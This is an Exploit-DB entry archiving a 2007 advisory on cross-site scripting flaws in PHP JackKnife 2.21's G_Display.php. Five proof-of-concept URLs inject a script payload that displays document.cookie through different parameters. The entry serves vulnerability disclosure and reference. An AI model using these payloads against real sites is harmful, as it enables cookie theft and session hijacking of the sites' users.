PHP JackKnife 2.21 PHPJK G_Display.php Multiple Parameter XSS

2007-05-31T00:00:00
ID EDB-ID:30116
Type exploitdb
Reporter laurent gaffie
Modified 2007-05-31T00:00:00

Description

PHP JackKnife 2.21 (PHPJK) G_Display.php Multiple Parameter XSS. CVE-2007-3001. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/24253/info
    
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
    
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=</textarea>'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?iDBLoc=</textarea>'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?iTtlNumItems=</textarea>'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?&iNumPerPage=</textarea>'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?sSort=</textarea>'"><script>alert(document.cookie)</script>